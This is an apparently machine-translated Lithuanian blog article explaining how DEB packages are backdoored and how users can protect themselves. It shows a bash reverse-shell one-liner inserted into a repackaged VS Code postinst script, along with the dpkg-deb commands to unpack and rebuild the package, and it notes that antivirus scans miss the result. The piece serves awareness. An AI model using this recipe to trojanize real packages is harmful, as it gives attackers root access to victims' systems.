Ar žinojote, kad užpuolikai gali modifikuoti scenarijus, supakuotus į DEB failą, kad gautų neteisėtą prieigą prie jūsų kompiuterio? Štai kaip DEB paketai yra užpakaliniai.
Key Takeaways
- DEB paketus galima lengvai uždaryti užpakalinėmis durimis, todėl užpuolikai gali įvesti kenkėjišką kodą į jūsų sistemą, kai juos įdiegiate su root leidimais.
- Užkrėstus DEB paketus sunku aptikti, nes jų gali nepažymėti antivirusinė programinė įranga ar debesų sprendimai, tokie kaip VirusTotal.
- Norėdami apsisaugoti, neatsisiųskite DEB paketų iš atsitiktinių svetainių, laikykitės oficialių atsisiuntimo svetainių arba bendruomenės patikimose svetainėse ir apsvarstykite galimybę įdiegti saugos įrankius, kad apsaugotumėte „Linux“ sistemą nuo tinklo išpuolių.
DEB failai yra programinės įrangos paketai, kurie yra pagrindinis programinės įrangos siuntimo Debian pagrindu sukurtuose Linux platinimuose formatas.
Norėdami įdiegti DEB paketus, turite naudoti paketų tvarkyklę, pvz., dpkg, su root teisėmis. Užpuolikai tuo pasinaudoja ir į šiuos paketus įleidžia užpakalines duris. Kai įdiegiate juos naudodami dpkg ar bet kurią kitą paketų tvarkyklę, kenkėjiškas kodas taip pat vykdomas kartu ir pažeidžia jūsų sistemą.
Išsiaiškinkime, kaip DEB paketai yra užpakaliniai ir ką galite padaryti, kad apsisaugotumėte.
Kaip DEB paketai užpakaliniai?
Prieš suprasdami, kaip DEB paketai yra užpakaliniai, panagrinėkime, kas yra DEB paketo viduje. Norėdami parodyti, atsisiųsiu „Microsoft Visual Studio Code DEB“ paketą iš oficialios „Microsoft“ svetainės. Tai yra tas pats paketas, kurį atsisiųsite, jei norite įdiegti „VS Code“ sistemoje „Linux“.
Parsisiųsti:Visual Studio kodas
Dabar, kai atsisiuntėte tikslinį paketą, laikas jį išpakuoti. DEB paketą galite išpakuoti naudodami dpkg-deb komandą su -R vėliavėlė, po kurios nurodomas turinio saugojimo kelias:
dpkg-deb -R
Tai turėtų ištraukti VS kodo paketo turinį.
Perėję į aplanką rasite kelis katalogus, tačiau mus domina tik DEBIANAS katalogas. Šiame kataloge yra priežiūros priemonių scenarijų, kurie vykdomi diegiant su root teisėmis. Kaip jau galėjote suprasti, užpuolikai modifikuoja šio katalogo scenarijus.
Norėdami parodyti, aš pakeisiu postinst scenarijų ir pridėkite paprastą vienos eilutės „Bash“ atvirkštinį TCP apvalkalą. Kaip rodo pavadinimas, tai yra scenarijus, kuris vykdomas įdiegus paketą sistemoje.
Jame yra komandos, kurios užbaigia konfigūraciją, pvz., simbolinių nuorodų nustatymas, priklausomybės tvarkymas ir kt. Internete galite rasti daugybę skirtingų atvirkštinių apvalkalų. Dauguma jų veiks taip pat. Štai atvirkštinio apvalkalo vieno įdėklo pavyzdys:
bash -i >& /dev/tcp/127.0.0.1/42069 0>&1
Komandos paaiškinimas:
- bash: Tai komanda, kuri iškviečia „Bash“ apvalkalą.
- -aš: Vėliava nurodo „Bash“ veikti interaktyviu režimu, leidžiančiu realiuoju laiku komandų įvestis / išvestis.
-
>& /dev/tcp/ip/port: Tai peradresuoja standartinė išvestis ir standartinė klaida į tinklo lizdą, iš esmės užmezgant TCP ryšį su
ir . - 0>&1: Taip įvestis ir išvestis nukreipiami į tą pačią vietą, ty į tinklo lizdą.
Tiems, kurie nėra inicijuoti, atvirkštinis apvalkalas yra kodo tipas, kuris, kai jis vykdomas tiksliniame kompiuteryje, inicijuoja ryšį atgal su užpuoliko kompiuteriu. Atvirkštiniai apvalkalai yra puikus būdas apeiti užkardos apribojimus, nes srautas generuojamas iš mašinos, esančios už ugniasienės.
Štai kaip atrodo pakeistas scenarijus:
Kaip matote, viskas yra taip pat, bet buvo pridėta tik viena eilutė, ty mūsų Bash atvirkštinis apvalkalas. Dabar turite sukurti failus atgal į ".deb“ formatu. Tiesiog naudokite dpkg komandą su -- statyti vėliava ar naudojimas dpkg-deb su -b vėliavėlė, po kurios nurodomas ištraukto turinio kelias:
dpkg --build
dpkg-deb -b
Dabar DEB paketas su užpakalinėmis durimis yra paruoštas išsiųsti į kenkėjiškas svetaines. Imituokite scenarijų, kai auka atsisiuntė DEB paketą į savo sistemą ir diegia jį kaip bet kurį kitą įprastą paketą.
Viršutinė terminalo sritis skirta aukos POV, o apatinė – užpuoliko POV. Auka diegia paketą su sudo dpkg -i o užpuolikas kantriai klausosi gaunamų ryšių naudodamas netcat komanda Linux.
Kai tik diegimas bus baigtas, pastebėkite, kad užpuolikas gauna atvirkštinį apvalkalo ryšį ir dabar turi pagrindinę prieigą prie aukos sistemos. Dabar jūs žinote, kaip DEB paketai yra užpakaliniai. Dabar sužinokime, kaip galite apsisaugoti.
Kaip aptikti, ar DEB paketas yra kenkėjiškas
Dabar, kai žinote, kad užkrėsti DEB paketai yra dalykas, jums tikriausiai įdomu, kaip rasti užkrėstus. Pradedantiesiems galite pabandyti naudoti a Linux antivirusinė programinė įranga kaip ClamAV. Deja, kai buvo paleistas paketo ClamAV nuskaitymas, jis nebuvo pažymėtas kaip kenkėjiškas. Štai nuskaitymo rezultatas:
Taigi, jei neturite aukščiausios kokybės antivirusinio sprendimo (tai negarantuoja, kad nebūsite nulaužti), aptikti kenkėjiškus DEB paketus yra gana sunku. Pabandykime naudoti debesies sprendimą, pvz., VirusTotal svetainę:
Kaip matote, „VirusTotal“ nieko blogo neaptiko. Na, vienintelis būdas apsisaugoti nuo tokių grėsmių yra laikytis elementarios saugos higienos, pvz., visada neatsisiųsti failų iš nežinomų šaltinių. patikrinti failo maišą, ir apskritai vengiant įdiegti šešėlinę programinę įrangą.
Internetas pilnas tokių grėsmių. Vienintelis būdas naršyti neprarandant duomenų – turėti žinių apie save ir naršyti patikimose svetainėse. Be to, jei naudojate „Linux“, taip pat turėtumėte pabandyti išsiaiškinti, ar atsisiunčiama programinė įranga turi „AppImage“ variantas nes jie yra savarankiški ir gali būti sudėti į smėlio dėžę, todėl jie nesiliečia su jūsų sistema.
Nesisiųskite DEB paketų iš atsitiktinių svetainių!
DEB paketai iš esmės nėra blogi, tačiau užpuolikai gali lengvai panaudoti ginklus ir išsiųsti juos nieko neįtariantiems vartotojams. Kaip parodyta, DEB paketą galima lengvai atidaryti ir modifikuoti, kad būtų pridėtas pasirinktinis kodas, naudojant tik keletą komandų, todėl jis yra įprastas kenkėjiškų programų siuntimo vektorius.
Net ir paprastų DEB paketų užpakalinių durų nepastebi geriausi antivirusiniai sprendimai. Taigi geriausia žaisti saugiai, naršydami internete naudotis sveiku protu ir visada atsisiųsti programinę įrangą tik iš oficialių atsisiuntimo svetainių arba bendruomenės patikimų svetainių.
Dabar, kai žinote apie saugumo riziką, kylančią diegiant DEB paketus iš naujų ar nežinomų svetainių, turėtumėte būti atsargūs diegdami naują programinę įrangą. Tačiau neužtenka tik būti atsargiems dėl to, ką įdiegiate. Jūsų Linux sistema taip pat gali būti tinklo atakų taikiniu.
Kad būtumėte saugūs tinklo atakos atveju, turėtumėte apsvarstyti galimybę įdiegti tinklo saugos įrankius.